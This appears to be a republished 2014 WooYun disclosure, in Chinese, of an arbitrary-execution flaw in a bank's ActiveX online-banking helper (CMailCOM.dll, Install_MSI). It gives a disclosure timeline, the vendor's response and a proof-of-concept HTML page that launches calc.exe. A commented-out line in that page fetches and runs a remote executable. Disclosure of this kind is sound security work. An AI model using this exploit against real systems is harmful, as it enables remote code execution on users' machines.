[公开漏洞]某商业银行网银伴侣v2.0.0.0.0.activex任意文件执行漏洞

    来源:WooYun 浏览:506次 时间:2014-07-05
某商业银行网银伴侣v2.0.0.0.0.activex任意文件执行漏洞 相关厂商: 某商业银行 漏洞作者:cloud4986 提交时间:2014-05-21 19:16 公开时间:2014-07-05 19:17 漏洞类型:命令执行 危害等级:高 自评Rank:15 漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理 漏洞来源:http://www.wooyun.org Tags标签: 网银安全控件activex 漏洞详情 披露状态:

2014-05-21:细节已通知厂商并且等待厂商处理中
2014-05-26:厂商已经确认,细节仅向厂商公开
2014-06-05:细节向核心白帽子及相关领域专家公开
2014-06-15:细节向普通白帽子公开
2014-06-25:细节向实习白帽子公开
2014-07-05:细节向公众公开

简要描述:

漏洞名称:某商业银行网银伴侣v2.0.0.0.activex任意文件执行漏洞
影响版本:某商业银行网银伴侣v2.0.0.0
验证环境:winxp\win7中文版sp1中文,ie6.0-ie8.0)
问题文件:CMailCOM.dll
问题描述:某商业银行网银伴侣v2.0.0.0.0.activex Install_MSI函数没有对文件执行检查,导致可以远程下载木马或执行本地的任意程序。

详细说明:

中信银行网银伴侣v2.0.0.0.0.activex Install_MSI函数没有对文件执行检查,导致可以远程下载木马或执行本地的任意程序。其中如果“//”注释部分是远程下载ftpfuzz并允许的代码

POC代码:

<html>

<body>

<object classid='clsid:A38F2B9A-2DD3-4C88-86EE-15C01EB565EA' id='target' /></object>

<script>

var str = '';

str = str +'C:\\WINDOWS\\System32\\calc.exe';

//"http://bj.baidupcs.com/file/8afe498c9f126015a70ae0c3ce1a9b63?fid=3675168192-250528-678972838405721&time=1400665296&sign=FDTAXER-DCb740ccc5511e5e8fedcff06b081203-MfWZ2p8aIRiyTWAdPJp9n8qZ9fU%3D&to=bb&fm=N,B,U,nc&newver=1&expires=1400665896&rt=sh&r=805615569&logid=841455764&sh=1&vuk=3675168192&fn=ftpfuzz.exe" ;

target.Install_MSI(str);

</script>

</body>

</html>

漏洞证明:

.png

修复方案:

版权声明:转载请注明来源 cloud4986@乌云 漏洞回应 厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-05-26 14:13

厂商回复:

CNVD确认并复现所述情况,转由CNCERT向网站管理单位通报。

最新状态:

暂无

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细